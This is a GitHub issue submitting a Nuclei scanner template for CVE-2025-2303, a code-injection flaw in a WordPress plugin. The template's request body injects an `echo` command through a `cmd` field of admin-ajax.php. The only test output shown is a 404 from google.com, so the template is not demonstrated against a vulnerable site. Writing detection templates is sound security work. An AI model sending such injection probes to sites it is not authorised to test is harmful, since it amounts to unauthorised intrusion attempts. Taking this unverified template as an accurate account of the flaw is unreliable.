### ISSUE TITLE
[TEMPLATE CONTRIBUTION] ...

### ISSUE THREAD

**Issue by D3fu1t** [projectdiscovery/nuclei-templates#11787]
### Is there an existing template for this?

- [x] I have searched the existing templates.

### Nuclei Template

```yaml
id: CVE-2025-2303

info:
  name: WordPress Block Logic Plugin Remote Code Injection
  author: Al Baradi Joy 
  severity: high
  tags: wordpress, plugin, rce, cve2025-2303

requests:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: "action=block_logic&cmd=echo 'vulnerable'"

    matchers:
      - type: word
        words:
          - "vulnerable"
```

### Relevant dumped responses

```shell
[DBG] [CVE-2025-2303] Dumped HTTP response https://google.com/wp-admin/admin-ajax.php

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 1584
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Type: text/html; charset=UTF-8
Date: Sat, 22 Mar 2025 16:36:27 GMT
Referrer-Policy: no-referrer

<!DOCTYPE html>
<html lang=en>
  <meta charset=utf-8>
  <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">
  <title>Error 404 (Not Found)!!1</title>
  <style>
    *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}
  </style>
  <a href=//www.google.com/><span id=logo aria-label=Google></span></a>
  <p><b>404.</b> <ins>That’s an error.</ins>
  <p>The requested URL <code>/wp-admin/admin-ajax.php</code> was not found on this server.  <ins>That’s all we know.</ins>
```

### Anything else?

https://vulners.com/cve/CVE-2025-2303

https://nvd.nist.gov/vuln/detail/CVE-2025-2303

https://secalerts.co/vulnerability/CVE-2025-2303
